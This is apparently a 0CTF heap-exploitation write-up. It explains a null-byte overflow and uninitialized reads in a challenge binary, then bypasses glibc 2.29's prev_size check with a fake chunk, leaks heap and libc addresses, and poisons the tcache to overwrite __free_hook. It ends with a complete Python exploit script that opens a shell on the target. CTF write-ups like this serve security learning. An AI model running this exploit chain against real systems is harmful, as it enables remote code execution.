This is one more challenge from the “heap exploitation puzzle franchise”. As many times before, you can interact with the heap almost directly. As is typical for 0CTF, allocations are tracked on an mmapped page at a completely random address, and the size of each allocation is stored alongside its address. There can be at most 16 allocations at a time. You can update, view and delete these allocations, and as long as you stay within the 16-allocation limit, you can also create new ones.
This challenge contains two vulnerabilities. First, allocations are created with malloc and not initialized, so viewing a chunk directly after allocation returns whatever old content the memory still holds. Second, when updating a chunk you can only provide as many bytes as the size you specified at allocation time, but a null byte is always appended afterwards. This results in the infamous null byte overflow.
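To make the second bug concrete, here is a minimal, self-contained sketch (not part of the exploit, and assuming the usual x86-64 glibc chunk layout) of what the appended null byte does to the neighbouring chunk header. A request of 0xf8 bytes yields a 0x100-byte chunk, so the user data ends exactly at the next chunk's size field:

import struct

heap = bytearray(0x200)                                    # two adjacent 0x100 chunks
heap[0x008:0x010] = struct.pack("<Q", 0x101)               # first chunk: size 0x100 | prev_in_use
heap[0x108:0x110] = struct.pack("<Q", 0x101)               # second chunk: size 0x100 | prev_in_use

payload = b"A" * 0xf8                                      # the maximum the update handler accepts
heap[0x010:0x010 + len(payload) + 1] = payload + b"\x00"   # the binary appends this null byte

# the null byte landed on the low byte of the second chunk's size field
assert struct.unpack_from("<Q", heap, 0x108)[0] == 0x100   # prev_in_use cleared

The overwritten byte clears the neighbour's prev_in_use bit (and could truncate its size), which is exactly the primitive the consolidation trick below builds on.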
In the libc version (2.29) used in this task, a consistency check was added: when a chunk is consolidated backwards, the size of the previous chunk must match the value of prev_size. With this check, the usual “forgotten chunk” technique cannot be used directly. As a recap, you would create a situation with a free chunk followed by two used ones, overflow from the second into the third chunk, clear its prev_in_use bit and set its prev_size to the size of the first two chunks combined. When the third chunk is subsequently freed, it consolidates backwards and swallows the chunk in the middle. The problem here is that, without modifying the header of the first chunk, the size == prev_size check added in this libc version would fail. To circumvent it, we have to create a fake chunk header, but that adds the complexity of faking a doubly-linked list structure. The simplest doubly-linked list we can create has the forward and backward pointers of the fake chunk point to itself. For this we have to know the address of the heap, which we obtain by combining the first vulnerability with the tcache free list.
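The following sketch (illustrative only, with a made-up heap address) shows the fake header we are aiming for: its size matches the prev_size we will plant in the victim chunk, and pointing fd and bk at the fake chunk itself makes the unlink integrity check (fd->bk == p and bk->fd == p) hold trivially:

import struct

fake_addr = 0x55550000a350      # hypothetical: leaked heap address plus a fixed offset
fake_header = struct.pack("<QQQ",
    0x201,                      # size 0x200 (| prev_in_use); must equal the planted prev_size
    fake_addr,                  # fd at fake_addr + 0x10 -> the fake chunk itself
    fake_addr)                  # bk at fake_addr + 0x18 -> the fake chunk itself
# written starting at fake_addr + 0x8, i.e. over the size field of the fake chunk

In the exploit below this is the struct.pack("<QQQ", 0x201, heap + 0x350, heap + 0x350) written into the enlarged chunk 0.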
Chunks are only consolidated backwards when they are actually freed into the regular bins, but libc 2.29 uses the tcache: a per-size cache of up to seven entries that are held back from the backend allocator. These seven chunks are stored in a singly-linked list whose next pointer is kept inline in the chunk's user data. As we have to saturate this list anyway before chunks are really freed, we can free a couple of chunks into it, allocate one of them again and, because of vulnerability one, read its stale next pointer, which gives us a heap address. Now we can finally build our fake chunk and use it in place of the first chunk from the “forgotten chunk” technique. Two allocations now overlap, granting us full control over the heap management structures stored inline. We abuse the tcache free list to allocate a chunk inside libc and overwrite __free_hook.
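Before the full script, a byte-level sketch of that last step (assumptions: the libc leak has already happened, and our overlapping chunk lets us write the first quadword of a chunk sitting at the head of its tcache bin). In glibc 2.29 a freed tcache chunk keeps its next pointer inline at offset 0 of its user data, so replacing that pointer makes the second allocation of the same size return an address of our choosing:

import struct

libc_base = 0x7f1234000000               # hypothetical, recovered from the unsorted-bin leak
free_hook = libc_base + 0x1e75a8         # offset of __free_hook in this libc (see constants below)

poison = struct.pack("<Q", free_hook)    # new tcache next pointer for the freed chunk
# write `poison` over the first 8 bytes of the freed, overlapping chunk, then:
#   malloc(0xf8)  -> returns that chunk once more
#   malloc(0xf8)  -> returns __free_hook itself; write system there and free a "/bin/sh" chunk

In the script the pointer is written as struct.pack(...)[:-1]: since the update primitive appends a null byte anyway, it conveniently supplies the pointer's most significant (zero) byte. The full exploit ties all of these steps together: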
#!/usr/bin/env python3
import re
import socket
import struct
import sys
import telnetlib
# offsets into the challenge's libc 2.29
libc_free_hook = 0x1e75a8
libc_arena = 0x1e4f90
libc_system = 0x52fd0
# read from the socket one byte at a time until delim is seen (or the peer closes),
# retrying on EINTR
def recv_until(sock, delim):
    tmp = b''
    while delim not in tmp:
        try:
            r = sock.recv(1)
            if not r:
                return tmp
            tmp += r
        except InterruptedError:
            pass
    return tmp
# menu option 1: allocate a chunk of l bytes and return the index reported by the binary
def add(s, l):
    s.send("1\n{:d}\n".format(l).encode())
    recv_until(s, b"Size: ")
    line = recv_until(s, b"\n").decode()
    m = re.match("Chunk ([0-9]+) Allocated", line)
    return int(m.group(1))
# menu option 2: write d into chunk i; the binary appends a terminating null byte
def update(s, i, d):
    s.send("2\n{:d}\n{:d}\n".format(i, len(d)).encode())
    recv_until(s, b"Content: ")
    s.send(d)
# menu option 3: free chunk i
def delete(s, i):
    s.send("3\n{:d}\n".format(i).encode())
    recv_until(s, b"Index")
# menu option 4: read back the contents of chunk i (everything up to the next menu)
def view(s, i):
    s.send("4\n{:d}\n".format(i).encode())
    recv_until(s, b"Index: ")
    st = b"1. Allocate"
    recv_until(s, "Chunk[{:d}]: ".format(i).encode())
    return recv_until(s, st)[:-len(st)-1]
tar = ("localhost", 1337)
if len(sys.argv) == 3:
    tar = (sys.argv[1], int(sys.argv[2]))
with socket.socket() as s:
    s.connect(tar)
    # three adjacent 0x100 chunks
    add(s, 0xf8) # 0
    add(s, 0xf8) # 1
    add(s, 0xf8) # 2
    # put two chunks into the tcache, reallocate one and read its stale next pointer (vuln 1)
    delete(s, 1)
    delete(s, 0)
    add(s, 0xf8) # 0
    heap = int.from_bytes(view(s, 0), "little") - 0x260 - 0x100
    print("[+] heap @ {:#x}".format(heap))
    add(s, 0xf8) # 1
    for i in range(10): # 3 - 12
        add(s, 0xf8)
    # fill tcache free list
    for i in range(7): # 5 - 11
        delete(s, 5 + i)
    # combine chunks 0, 1
    delete(s, 1)
    delete(s, 0)
    # allocate it
    add(s, 0x1f8) # 0
    # write fake chunk
    update(s, 0, b"SPARTA".ljust(0xf8, b"A") + struct.pack("<QQQ", 0x201, heap + 0x350, heap + 0x350))
    # clear prev_in_use and set prev_size
    update(s, 2, b"sparta".ljust(0xf0, b"a") + struct.pack("<Q", 0x200))
    # forgotten chunk
    delete(s, 3)
    # drain tcaches
    tmp = [add(s, 0xf8) for i in range(7)]
    # alloc forgotten chunk (the upper chunk of the combined ones is in its place -> libc leak)
    low = add(s, 0xf8)
    libc = int.from_bytes(view(s, low), "little") - libc_arena
    print("[+] libc @ {:#x}".format(libc))
    # generic tcache __free_hook pwn
    dbl = add(s, 0xf8)
    delete(s, low)
    delete(s, dbl)
    update(s, 2, struct.pack("<Q", libc + libc_free_hook)[:-1])
    tmp = add(s, 0xf8)
    hook = add(s, 0xf8)
    update(s, hook, struct.pack("<Q", libc + libc_system))
    update(s, tmp, b"/bin/sh")
    delete(s, tmp)
    print("$ ")
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()